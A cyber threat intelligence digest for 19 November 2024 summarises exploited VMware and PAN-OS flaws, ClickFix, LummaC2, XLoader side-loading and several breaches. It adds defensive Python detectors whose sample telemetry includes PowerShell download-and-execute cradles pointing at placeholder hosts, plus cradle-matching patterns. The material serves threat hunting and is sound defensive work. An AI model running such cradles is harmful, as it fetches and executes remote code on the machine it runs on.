Cyber Threat Intelligence 19 November 2024
Industrial Sector
- Many US Water Systems Exposed To ‘High-Risk’ Vulnerabilities, Watchdog Finds
"Nearly 100 drinking water systems across the U.S. have “high-risk” vulnerabilities in the technology they use to serve millions of residents, according to a new report from a federal watchdog. The Environmental Protection Agency’s Office of Inspector General conducted a review of the agency’s cybersecurity initiatives, using an algorithm to rank issues at specific water utilities across the U.S. revolving around email security, IT hygiene, vulnerabilities, adversarial threats, and malicious activity."
https://therecord.media/us-water-systems-exposed-vulnerabilities
https://www.epaoig.gov/reports/other/management-implication-report-cybersecurity-concerns-related-drinking-water-systems
https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/
https://hackread.com/cybersecurity-flaws-us-drinking-water-systems-risks/
New Tooling
- ScubaGear: Open-Source Tool To Assess Microsoft 365 Configurations For Security Gaps
"ScubaGear is an open-source tool the Cybersecurity and Infrastructure Security Agency (CISA) created to automatically evaluate Microsoft 365 (M365) configurations for potential security gaps. ScubaGear analyzes an organization’s M365 tenant configuration, offering actionable insights and recommendations to help administrators address security gaps and strengthen defenses within their Microsoft 365 environment."
https://www.helpnetsecurity.com/2024/11/18/scubagear-open-source-tool-assess-microsoft-365-security/
https://github.com/cisagov/ScubaGear
Vulnerabilities
- Critical RCE Bug In VMware vCenter Server Now Exploited In Attacks
"Broadcom warned today that attackers are now exploiting two VMware vCenter Server vulnerabilities, one of which is a critical remote code execution flaw. TZL security researchers reported the RCE vulnerability (CVE-2024-38812) during China's 2024 Matrix Cup hacking contest. It is caused by a heap overflow weakness in the vCenter's DCE/RPC protocol implementation and affects products containing vCenter, including VMware vSphere and VMware Cloud Foundation."
https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/
https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/
https://securityaffairs.com/171147/security/vmware-vcenter-server-bugs-actively-exploited.html
https://www.theregister.com/2024/11/18/vmware_vcenter_rce_exploited/
- Palo Alto Networks Patches Two Firewall Zero-Days Used In Attacks
"Palo Alto Networks has finally released security updates for two actively exploited zero-day vulnerabilities in its Next-Generation Firewalls (NGFW). The first flaw, tracked as CVE-2024-0012, is an authentication bypass found in the PAN-OS management web interface that remote attackers can exploit to gain administrator privileges without requiring authentication or user interaction. The second one (CVE-2024-9474) is a PAN-OS privilege escalation security flaw that allows malicious PAN-OS administrators to perform actions on the firewall with root privileges."
https://www.bleepingcomputer.com/news/security/palo-alto-networks-patches-two-firewall-zero-days-used-in-attacks/
https://www.darkreading.com/cyberattacks-data-breaches/palo-alto-networks-patches-critical-zero-day-bug-firewalls
https://www.securityweek.com/palo-alto-networks-releases-iocs-for-new-firewall-zero-day/
https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/
- CISA Adds Three Known Exploited Vulnerabilities To Catalog
"CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2024-1212 Progress Kemp LoadMaster OS Command Injection Vulnerability
CVE-2024-0012 Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
CVE-2024-9474 Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"
https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog
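The KEV alert is only useful once it is joined to your own asset inventory and turned into a due-dated work list. The script below is an added example, not CISA's code: it parses a constructed subset of the KEV feed (same field names as the real known_exploited_vulnerabilities.json, CVE IDs from the 18 November alert, but the dueDate values and the inventory hosts and versions are assumptions) and matches vendor and product against an inventory. Because KEV carries no version data, a hit means "read the vendor advisory for this host", not "this host is vulnerable".

```python
"""Turn a CISA KEV feed into a due-dated work list for the assets you actually run.

Added example, not CISA tooling. KEV_TEXT is a constructed subset of the feed;
dueDate values and the inventory are assumptions for illustration.
"""
import json
from datetime import date

KEV_TEXT = """{
  "vulnerabilities": [
    {"cveID": "CVE-2024-1212", "vendorProject": "Progress", "product": "Kemp LoadMaster",
     "vulnerabilityName": "Progress Kemp LoadMaster OS Command Injection Vulnerability",
     "dateAdded": "2024-11-18", "dueDate": "2024-12-09"},
    {"cveID": "CVE-2024-0012", "vendorProject": "Palo Alto Networks", "product": "PAN-OS",
     "vulnerabilityName": "Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability",
     "dateAdded": "2024-11-18", "dueDate": "2024-12-09"},
    {"cveID": "CVE-2024-9474", "vendorProject": "Palo Alto Networks", "product": "PAN-OS",
     "vulnerabilityName": "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability",
     "dateAdded": "2024-11-18", "dueDate": "2024-12-09"}
  ]
}"""

# Constructed asset inventory; hostnames and versions are illustrative only.
INVENTORY = [
    {"host": "fw-edge-01", "vendor": "Palo Alto Networks", "product": "PAN-OS", "version": "10.2.10"},
    {"host": "lb-dmz-02", "vendor": "Progress Software", "product": "Kemp LoadMaster", "version": "7.2.59"},
    {"host": "vpn-01", "vendor": "Cisco", "product": "ASA", "version": "9.18"},
]


def _norm(s):
    """Case- and whitespace-insensitive form for vendor/product comparison."""
    return " ".join(s.lower().split())


def parse_kev(text):
    """Parse KEV JSON text into entries with real date objects."""
    entries = []
    for v in json.loads(text)["vulnerabilities"]:
        entries.append({
            "cve": v["cveID"], "vendor": v["vendorProject"], "product": v["product"],
            "name": v["vulnerabilityName"],
            "added": date.fromisoformat(v["dateAdded"]),
            "due": date.fromisoformat(v["dueDate"]),
        })
    return entries


def match_inventory(entries, inventory, today):
    """One finding per (KEV entry, asset) pair whose vendor and product match.

    Substring match on normalized vendor and product: KEV has no version field,
    so a hit is a prompt to check the vendor advisory, not a confirmed exposure.
    """
    findings = []
    for e in entries:
        for a in inventory:
            if _norm(e["vendor"]) in _norm(a["vendor"]) and _norm(e["product"]) in _norm(a["product"]):
                days_left = (e["due"] - today).days
                findings.append({
                    "cve": e["cve"], "host": a["host"], "product": a["product"],
                    "version": a["version"], "due": e["due"].isoformat(),
                    "days_left": days_left, "overdue": days_left < 0,
                })
    # Earliest deadline first so the list reads as a work queue.
    findings.sort(key=lambda f: (f["due"], f["cve"], f["host"]))
    return findings


if __name__ == "__main__":
    for f in match_inventory(parse_kev(KEV_TEXT), INVENTORY, date(2024, 11, 19)):
        flag = "OVERDUE" if f["overdue"] else f"{f['days_left']}d left"
        print(f"{f['due']}  {f['cve']}  {f['host']} ({f['product']} {f['version']})  {flag}")
```

For live use, fetch the real feed from the CISA KEV JSON URL and feed its text to parse_kev; the inventory would come from your CMDB export. The match is deliberately loose so that a vendor renaming (here "Progress" versus "Progress Software") does not hide a finding.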
Malware
- Distribution Of LummaC2 Infostealer Based On Legitimate Programs
"LummaC2 is an Infostealer actively being distributed while being disguised as illegal software such as cracks, and its distribution and creation methods are changing continuously. It has recently been distributed by being inserted into legitimate programs, so caution is needed."
https://asec.ahnlab.com/en/84556/
- Inside Water Barghest’s Rapid Exploit-To-Market Strategy For IoT Devices
"There is a big incentive for both espionage motivated actors and financially motivated actors to set up proxy botnets. These can serve as an anonymization layer, which can provide plausibly geolocated IP addresses to scrape contents of websites, access stolen or compromised online assets, and launch cyber-attacks. Examples of proxy botnets set up by advanced persistent threat (APT) actors are the VPNFilter botnet and Cyclops Blink, both deployed by Sandworm and disrupted by the Federal Bureau of Investigation (FBI) in 2018 and 2022, respectively."
https://www.trendmicro.com/en_us/research/24/k/water-barghest.html
https://www.bankinfosecurity.com/suspected-russian-hackers-infect-20000-iot-devices-a-26840
- Inside Bitdefender Labs’ Investigation Of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
"Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta’s social media platform Facebook. The campaign tricks users into installing a harmful browser extension under the guise of a security update."
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users
https://www.bleepingcomputer.com/news/security/fake-bitwarden-ads-on-facebook-push-info-stealing-chrome-extension/
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/
- Microsoft 365 Admin Portal Abused To Send Sextortion Emails
"The Microsoft 365 Admin Portal is being abused to send sextortion emails, making the messages appear trustworthy and bypassing email security platforms. Sextortion emails are scams claiming that your computer or mobile device was hacked to steal images or videos of you performing sexual acts. The scammers then demand from you a payment of $500 to $5,000 to prevent them from sharing the compromising photos with your family and friends."
https://www.bleepingcomputer.com/news/security/microsoft-365-admin-portal-abused-to-send-sextortion-emails/
- Akira Ransomware Racks Up 30+ Victims In a Single Day
"Akira ransomware group has updated its data-leak website on Nov. 13-14, listing more than 30 of its latest victims — the highest single-day total since the gang first began its malicious operations in March of last year. The group spares no one, targeting a variety of industries globally, and operates using a ransomware-as-a-service (RaaS) model, stealing sensitive data before encrypting it."
https://www.darkreading.com/cyberattacks-data-breaches/akira-ransomware-30-victims-single-day
https://therecord.media/akira-ransomware-group-publishes-unprecedented-leak-data
https://drive.google.com/file/d/11ZjlJg2LDHAOwxFjUsqaZrK7Yg15IrAw/view
- Government Agency Spoofing: DocuSign Attacks Exploit Government-Vendor Trust
"The latest wave of DocuSign attacks has taken a concerning turn, specifically targeting businesses that regularly interact with state, municipal, and licensing authorities. From November 8 through November 14, we have observed a 98% increase in the use of DocuSign phishing URLs compared to all of September and October. In the last few days, our threat researchers are seeing hundreds of instances each day, many of which involve government impersonations. What’s more, the specific tactics employed in these attacks are evolving on a daily basis. Contact us for more information about DocuSign attack metrics."
https://slashnext.com/blog/government-docusign-impersonation-attacks/
https://hackread.com/us-govt-agencies-impersonate-docusign-phishing-scams/
- Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape
"Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever. Initially observed earlier this year in campaigns from initial access broker TA571 and a fake update website compromise threat cluster known as ClearFake, the ClickFix technique that attempts to lure unsuspecting users to copy and run PowerShell to download malware is now much more popular across the threat landscape. The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer."
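The ClickFix chain leaves a distinctive footprint in endpoint telemetry: the victim pastes the command into the Run box (or a console), so PowerShell is spawned by an interactive parent such as explorer.exe, and the command line is a download-and-execute cradle, often base64-encoded with -EncodedCommand. The hunt below is an added example, not Proofpoint's detection content: it scores constructed Sysmon Event ID 1-style process-creation records, decodes any -EncodedCommand argument (UTF-16LE base64) before pattern matching, and flags only the combination of interactive parent plus cradle, since either half alone is routine admin activity. The regex list, the parent-process assumption and the sample hostnames (reserved .invalid TLD) are assumptions for this example.

```python
"""Hunt for ClickFix-style executions in process-creation telemetry.

Added example (not Proofpoint's detection content). Patterns, parent-process
assumption and sample events are constructed for illustration.
"""
import base64
import re

# Signs that a PowerShell command line is a download-and-execute cradle.
CRADLE_PATTERNS = [
    (r"\b(?:iex|invoke-expression)\b", "invoke-expression"),
    (r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b", "web download"),
    (r"downloadstring|downloadfile", "WebClient download"),
    (r"frombase64string", "inline base64 payload"),
    (r"-(?:w|win|windowstyle)\s+hidden", "hidden window"),
]
# Win+R / Run dialog launches have explorer.exe as parent (assumption: the lure
# tells the victim to paste into the Run box, as the Proofpoint brief describes).
INTERACTIVE_PARENTS = {"explorer.exe"}
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64), or ''."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # not a valid encoded command; fall back to the raw line


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Classify one process-creation event (Image, ParentImage, CommandLine)."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    result = {"pid": ev.get("ProcessId"), "flagged": False, "reasons": [], "decoded": ""}
    if image not in ("powershell.exe", "pwsh.exe"):
        return result
    decoded = decode_encoded_command(ev["CommandLine"])
    result["decoded"] = decoded
    if decoded:
        result["reasons"].append("encoded command")
    text = ev["CommandLine"] + "\n" + decoded  # match on both raw and decoded text
    cradle_hits = [why for pat, why in CRADLE_PATTERNS if re.search(pat, text, re.I)]
    result["reasons"].extend(cradle_hits)
    if parent in INTERACTIVE_PARENTS:
        result["reasons"].append(f"parent {parent} (Run dialog / interactive paste)")
    # ClickFix = user-driven shell running a cradle; each half alone is common.
    result["flagged"] = parent in INTERACTIVE_PARENTS and bool(cradle_hits or decoded)
    return result


def hunt(events):
    return [r for r in (score_event(e) for e in events) if r["flagged"]]


def _enc(ps):
    """Build a -EncodedCommand argument the way a lure would (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records; not real telemetry
    {"ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (irm https://update.example.invalid/fix.ps1)"'},
    {"ProcessId": 4188, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _enc("iex (iwr http://cdn.example.invalid/a.txt)")},
    {"ProcessId": 5012, "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ProcessId": 5090, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoExit -Command Get-Process"},
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r["pid"], ", ".join(r["reasons"]), "|", r["decoded"] or "(plain)")
```

The scheduled backup script (svchost parent, no cradle) and the interactive Get-Process (explorer parent, no cradle) stay quiet; the two pasted cradles fire, including the encoded one whose iex/iwr only appear after decoding. In production the same logic sits naturally in a SIEM rule keyed on ParentImage and CommandLine.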
https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
https://www.infosecurity-magazine.com/news/clickfix-cyber-malware-rise/
- QuickBooks Popup Scam Still Being Delivered Via Google Ads
"Accounting software QuickBooks, by Intuit, is a popular target for India-based scammers, only rivaled for top spot by the classic Microsoft tech support scams. We’ve seen two main lures, both via Google ads: the first one is simply a website promoting online support for QuickBooks and shows a phone number, while the latter requires victims to download and install a program that will generate a popup, also showing a phone number. In both instances, that number is fraudulent."
https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads
- Threat Brief: Operation Lunar Peek, Activity Related To CVE-2024-0012
"Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly."
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
- Exploit Attempts For Unpatched Citrix Vulnerability
"Last week, Watchtowr Labs released details describing a new and so far unpatched vulnerability in Citrix's remote access solution [1]. Specifically, the vulnerability affects the "Virtual Apps and Desktops." This solution allows "secure" remote access to desktop applications. It is commonly used for remote work, and I have seen it used in call center setups to isolate individual workstations from the actual desktop."
https://isc.sans.edu/diary/31446
- XLoader Executed Through JAR Signing Tool (jarsigner.exe)
"Recently, AhnLab SEcurity intelligence Center (ASEC) identified the distribution of XLoader malware using the DLL side-loading technique. The DLL side-loading attack technique saves a normal application and a malicious DLL in the same folder path to enable the malicious DLL to also be executed when the application is run. The legitimate application used in the attack, jarsigner, is a file created during the installation of the IDE package distributed by the Eclipse Foundation. It is a tool for signing JAR (Java Archive) files."
https://asec.ahnlab.com/en/84574/
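DLL side-loading, as described above, is detectable from image-load telemetry: a signed, legitimate host binary turns up in a user-writable directory and loads an unsigned DLL from that same directory. The script below is an added example, not ASEC's analysis code: it evaluates constructed, normalized image-load records (what you would get by joining a Sysmon Event ID 7 ImageLoaded event with the signer of the host process) against three rules, unsigned DLL beside the process in a user-writable directory, a System32 DLL name resolving outside Windows, and a known tool running outside its expected install root. The page does not name the DLL that XLoader used, so the DLL names, paths, the short list of hijackable system DLL names and the expected install roots for jarsigner.exe are all assumptions for illustration.

```python
"""Flag DLL side-loading candidates in image-load telemetry.

Added example, not ASEC's analysis code. RECORDS are constructed; the DLL
names, paths, SYSTEM_DLL_NAMES and EXPECTED_ROOT_HINTS are assumptions.
"""
import ntpath  # Windows path handling that also works on non-Windows hosts

RECORDS = [
    {"process": r"C:\Users\bob\AppData\Local\Temp\pkg\jarsigner.exe", "process_signed": True,
     "dll": r"C:\Users\bob\AppData\Local\Temp\pkg\jli.dll", "dll_signed": False},
    {"process": r"C:\Program Files\Eclipse Adoptium\jdk-17\bin\jarsigner.exe", "process_signed": True,
     "dll": r"C:\Program Files\Eclipse Adoptium\jdk-17\bin\jli.dll", "dll_signed": True},
    {"process": r"C:\Users\bob\Downloads\tool\update.exe", "process_signed": False,
     "dll": r"C:\Users\bob\Downloads\tool\version.dll", "dll_signed": False},
    {"process": r"C:\Windows\System32\notepad.exe", "process_signed": True,
     "dll": r"C:\Windows\System32\version.dll", "dll_signed": True},
]

TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Directories anyone can write to even though they sit under a trusted root.
WRITABLE_UNDER_TRUSTED = ("c:\\windows\\temp\\", "c:\\windows\\tasks\\")
# DLL names that normally resolve from System32; loading one from elsewhere is
# the classic search-order hijack. Short illustrative list, not exhaustive.
SYSTEM_DLL_NAMES = {"version.dll", "cryptbase.dll", "dbghelp.dll", "wtsapi32.dll", "userenv.dll"}
# Where the legitimate tool is expected to live (assumption for this example).
EXPECTED_ROOT_HINTS = {"jarsigner.exe": ("\\jdk", "\\jre", "\\eclipse", "\\java")}


def is_user_writable(directory):
    """True for locations an unprivileged user can drop files into."""
    d = directory.lower().rstrip("\\") + "\\"
    if d.startswith(WRITABLE_UNDER_TRUSTED):
        return True
    return not d.startswith(TRUSTED_ROOTS)


def evaluate(rec):
    """Apply the three side-loading rules to one image-load record."""
    proc_dir = ntpath.dirname(rec["process"]).lower()
    dll_dir = ntpath.dirname(rec["dll"]).lower()
    proc_name = ntpath.basename(rec["process"]).lower()
    dll_name = ntpath.basename(rec["dll"]).lower()
    reasons = []
    # Rule 1: unsigned DLL loaded from the process's own user-writable directory.
    if proc_dir == dll_dir and is_user_writable(dll_dir) and not rec["dll_signed"]:
        reasons.append("unsigned DLL loaded from the process's own user-writable directory")
        if rec["process_signed"]:
            reasons.append("signed host binary carried into that directory (classic side-load)")
    # Rule 2: a System32 DLL name resolving outside the Windows directory.
    if dll_name in SYSTEM_DLL_NAMES and not dll_dir.startswith("c:\\windows\\"):
        reasons.append(f"system DLL name {dll_name} resolved outside Windows")
    # Rule 3: a known tool running from somewhere it is never installed.
    hints = EXPECTED_ROOT_HINTS.get(proc_name)
    if hints and not any(h in proc_dir for h in hints):
        reasons.append(f"{proc_name} running outside its expected install root")
    return {"process": rec["process"], "dll": rec["dll"],
            "suspicious": bool(reasons), "reasons": reasons}


def hunt(records):
    return [r for r in map(evaluate, records) if r["suspicious"]]


if __name__ == "__main__":
    for r in hunt(RECORDS):
        print(r["process"], "->", r["dll"])
        for why in r["reasons"]:
            print("   ", why)
```

The relocated jarsigner.exe trips all three rules; the same binary under its JDK install with a signed DLL is clean, as is notepad.exe loading version.dll from System32. Rule 1 on its own is the one worth tuning first, since a signed vendor binary sitting next to an unsigned DLL in a temp directory has very few benign explanations.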
Breaches/Hacks/Leaks
- Library Of Congress Says An Adversary Hacked Some Emails
"The Library of Congress has notified lawmakers of a “cyber breach” of its IT system by an adversary, a hack of emails between some congressional offices and library staff, according to an email obtained by The Associated Press. The library said that an adversary accessed email communications during the period from January to September. The matter has been referred to law enforcement, the library said. Authorities gave no immediate information on the attacker, including whether their identity was known."
https://www.securityweek.com/library-of-congress-says-an-adversary-hacked-some-emails/
https://securityaffairs.com/171138/data-breach/library-of-congress-email-communications-hacked.html
- US Space Tech Giant Maxar Discloses Employee Data Breach
"Hackers breached U.S. satellite maker Maxar Space Systems and accessed personal data belonging to its employees, the company informs in a notification to impacted individuals. The threat actor compromised the company network about a week before the discovery of the intrusion. Immediately after discovering the unauthorized access, the company took action to prevent the hackers from reaching further into the system."
https://www.bleepingcomputer.com/news/security/us-space-tech-giant-maxar-discloses-employee-data-breach/
- Ransomware Attack On Oklahoma Medical Center Impacts 133,000
"Great Plains Regional Medical Center in Oklahoma is notifying over 133,000 individuals that their personal information was compromised in a ransomware attack. The public, not-for-profit healthcare system discovered the attack on September 8, 2024, when ransomware was deployed, but the attackers had access to its systems for at least three days prior. According to the medical center, the attackers accessed and encrypted certain files between September 5 and September 8, and exfiltrated information from its systems."
https://www.securityweek.com/ransomware-attack-on-oklahoma-medical-center-impacts-133000/
- Ford 'Actively Investigating' After Employee Data Allegedly Parked On Leak Site
"Ford Motor Company says it is looking into allegations of a data breach after attackers claimed to have stolen an internal database containing 44,000 customer records and dumped the info on a cyber crime souk for anyone to "enjoy." "Ford is aware and is actively investigating the allegations that there has been a breach of Ford data," spokesperson Richard Binhammer told The Register. "Our investigation is active and ongoing." The erstwhile manufacturer of the Edsel declined to answer our questions about the possible compromise."
https://www.theregister.com/2024/11/18/ford_actively_investigating_breach/
General News
- Identity Fraud And The Cost Of Living Crisis: New Challenges For 2024
"Fraud is a rampant threat to individuals and organizations worldwide and across all sectors. In order to protect against the dangers of fraud in its many forms, it is vital to stay in the loop on the latest fraud trends and the threat landscape. The Fraudscape 2024 report from Cifas, the UK’s Fraud Prevention Community, is an effort to share this information to help prevent fraud. The report is compiled using data from Cifas’ National Fraud Database (NFD), Insider Threat Database (ITD), and intelligence from members, partners, and law enforcement agencies."
https://www.tripwire.com/state-of-security/identity-fraud-and-cost-living-crisis-new-challenges
- Cyberbiosecurity: Where Digital Threats Meet Biological Systems
"Cyberbiosecurity has emerged as an essential area of interest as the boundaries between the digital and biological sectors continue to blur. With rapid advancements in areas such as artificial intelligence, automation, and synthetic biology, the need for strong cyberbiosecurity protections has grown to safeguard the bioeconomy. As biotechnology evolves, it creates a complex landscape where breaches can have consequences far beyond typical cyber risks. Cyberbiosecurity is about securing the foundation of our biological future."
https://www.tripwire.com/state-of-security/cyberbiosecurity-where-digital-threats-meet-biological-systems
- Navigating The Compliance Labyrinth: A CSO’s Guide To Scaling Security
"Imagine navigating a labyrinth where the walls constantly shift, and the path ahead is obscured by fog. If this brings up a visceral image, you’ve either seen David Bowie’s iconic film or are very familiar with the real-world challenge of compliance in today’s fast-paced business environment."
https://www.helpnetsecurity.com/2024/11/18/cso-compliance-challenges/
- Transforming Code Scanning And Threat Detection With GenAI
"In this Help Net Security interview, Stuart McClure, CEO of Qwiet AI, discusses the evolution of code scanning practices, highlighting the shift from reactive fixes to proactive risk management. McClure also shares his perspective on the future of AI-driven code scanning, emphasizing the potential of machine learning in threat detection and remediation."
https://www.helpnetsecurity.com/2024/11/18/stuart-mcclure-qwiet-ai-code-scanning/
- UK Shoppers Lost £11.5m Last Christmas, NCSC Warns
"One of the UK’s leading cybersecurity agencies is urging the nation’s shoppers to stay safe online, after revealing that they lost over £11.5m ($14.5m) to fraudsters during last year’s festive period. Over recent years, the countdown to the busy Christmas shopping season has begun at around Black Friday, which falls this year on November 29, and lasts until early January. Yet new figures revealed today by the NCSC and Action Fraud note that scammers took an average of £695 from each of their online victims between November 2023 and January 2024."
https://www.infosecurity-magazine.com/news/ncsc-warns-uk-shoppers-lost-115m/
- US Charges Phobos Ransomware Admin After South Korea Extradition
"Evgenii Ptitsyn, a Russian national and suspected administrator of the Phobos ransomware operation, was extradited from South Korea and is facing cybercrime charges in the United States. Phobos is a long-running ransomware-as-a-service (RaaS) operation (derived from the Crysis ransomware family) widely distributed through many affiliates. Between May 2024 and November 2024, it accounted for roughly 11% of all submissions to the ID Ransomware service."
https://www.bleepingcomputer.com/news/security/us-charges-phobos-ransomware-admin-after-south-korea-extradition/
https://therecord.media/russian-national-in-custody-extradited
https://www.bankinfosecurity.com/accused-phobos-ransomware-hacker-in-us-custody-a-26839
https://cyberscoop.com/alleged-russian-phobos-ransomware-administrator-extradited-to-u-s-in-custody/
- Why The Demand For Cybersecurity Innovation Is Surging
"Companies have never faced a wider and more dynamic array of cyber threats than they do right now. From rapidly rising costs associated with data breaches and other cyberattacks to the exploitation of artificial intelligence (AI) to make attacks more effective than ever, the cyber-threat landscape is constantly evolving. This has led to a drastic increase in cybersecurity spending, as well as a wave of innovation in the sector."
https://www.darkreading.com/cyberattacks-data-breaches/why-demand-cybersecurity-innovation-is-surging
- Why Custom IOCs Are Necessary For Advanced Threat Hunting And Detection
"The speed, precision, timeliness, and relevance of Cyber Threat Intelligence (CTI) is crucial for protecting digital infrastructures and driving proactive responses against emerging cybersecurity threats. To me, CTI is an ART: it has to be Actionable, Reliable, and Timely. One of the most critical components of CTI is indicators of compromise (IOCs). IOCs are crumbs of data or fingerprints (e.g., unusual IP addresses and web domains, unexpected network traffic, suspicious changes in file systems) left by adversaries in a previous cyberattack. These serve as invaluable clues to security professionals for detecting and tracing potential breaches or malicious activities in their own environments. Despite the on-paper benefits of IOCs, most cybersecurity professionals struggle to utilize them effectively."
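Much of the struggle the article describes comes from treating IOCs as a flat string list: a domain indicator that does not catch subdomains, one that matches notevil.invalid when the indicator is evil.invalid, a C2 range that has to be expanded into every address, hashes that miss because of case, and indicators that never expire. The script below is an added example, not SecurityWeek's or any vendor's code: it keeps a typed, expiring indicator set with the right lookup per type (parent-domain match, CIDR containment, case-normalized hash) and runs it over constructed proxy, firewall and EDR log lines. All indicators and log lines are constructed, using documentation IP ranges and the reserved .invalid TLD, and carry no real threat data.

```python
"""Match typed, expiring IOCs against log lines with per-type semantics.

Added example, not vendor code. IOCS and SAMPLE_LOGS are constructed from
documentation ranges and the reserved .invalid TLD; none is a real indicator.
"""
import hashlib
import ipaddress
import re
from datetime import date

SAMPLE_HASH = hashlib.sha256(b"constructed dropper sample").hexdigest()
# (type, value, valid_until, context) - the context is what makes a hit actionable.
IOCS = [
    ("domain", "evil.invalid", "2024-12-31", "lure host (constructed)"),
    ("ip", "198.51.100.0/24", "2024-12-31", "C2 range (constructed)"),
    ("sha256", SAMPLE_HASH, "2024-12-31", "dropper (constructed)"),
    ("ip", "203.0.113.5", "2024-10-01", "old C2, expired (constructed)"),
]
SAMPLE_LOGS = [  # constructed log lines
    "2024-11-19T08:12:03Z proxy src=10.1.4.22 host=cdn.evil.invalid url=/update.bin status=200",
    "2024-11-19T08:12:09Z proxy src=10.1.4.22 host=notevil.invalid url=/ status=200",
    "2024-11-19T08:13:41Z fw action=allow src=10.1.4.22 dst=198.51.100.77 dport=443",
    f"2024-11-19T08:15:00Z edr host=WS-042 file=setup.exe sha256={SAMPLE_HASH.upper()}",
    "2024-11-19T08:16:00Z fw action=allow src=10.1.4.23 dst=203.0.113.5 dport=443",
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


class IocSet:
    """Typed indicator set; stale indicators are dropped at load time."""

    def __init__(self, iocs, today):
        self.domains, self.nets, self.hashes = {}, [], {}
        for kind, value, valid_until, context in iocs:
            if date.fromisoformat(valid_until) < today:
                continue  # expired indicators produce noise, not detections
            if kind == "domain":
                self.domains[value.lower().rstrip(".")] = (value, context)
            elif kind == "ip":
                self.nets.append((ipaddress.ip_network(value, strict=False), value, context))
            elif kind == "sha256":
                self.hashes[value.lower()] = (value, context)

    def match_domain(self, host):
        """Exact or parent-domain match on labels, so notevil.invalid never hits evil.invalid."""
        labels = host.lower().rstrip(".").split(".")
        for i in range(len(labels) - 1):  # never match on the bare TLD
            hit = self.domains.get(".".join(labels[i:]))
            if hit:
                return hit
        return None

    def match_ip(self, text):
        try:
            ip = ipaddress.ip_address(text)
        except ValueError:
            return None  # regex can extract 999.1.1.1; ignore it
        for net, value, context in self.nets:
            if ip in net:
                return (value, context)
        return None

    def match_hash(self, h):
        return self.hashes.get(h.lower())


def scan(lines, iocs):
    """Extract candidate observables from each line and look them up by type."""
    hits = []
    for n, line in enumerate(lines, 1):
        candidates = ([("domain", h, iocs.match_domain(h)) for h in HOST_RE.findall(line)]
                      + [("ip", i, iocs.match_ip(i)) for i in IPV4_RE.findall(line)]
                      + [("sha256", h, iocs.match_hash(h)) for h in SHA256_RE.findall(line)])
        seen = set()
        for kind, observed, hit in candidates:
            if hit and (kind, hit[0]) not in seen:
                seen.add((kind, hit[0]))
                hits.append({"line": n, "kind": kind, "observed": observed,
                             "ioc": hit[0], "context": hit[1]})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOGS, IocSet(IOCS, date(2024, 11, 19))):
        print(f"line {h['line']}: {h['kind']} {h['observed']} matched {h['ioc']} ({h['context']})")
```

Three lines hit (the subdomain of the lure host, an address inside the C2 range, and the upper-cased hash); the look-alike domain and the expired C2 address do not. The hostname regex will also extract things like update.bin from URLs, which is harmless here because matching, not extraction, decides what fires.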
https://www.securityweek.com/why-custom-iocs-are-necessary-for-advanced-threat-hunting-and-detection/
- DHS Releases Secure AI Framework For Critical Infrastructure
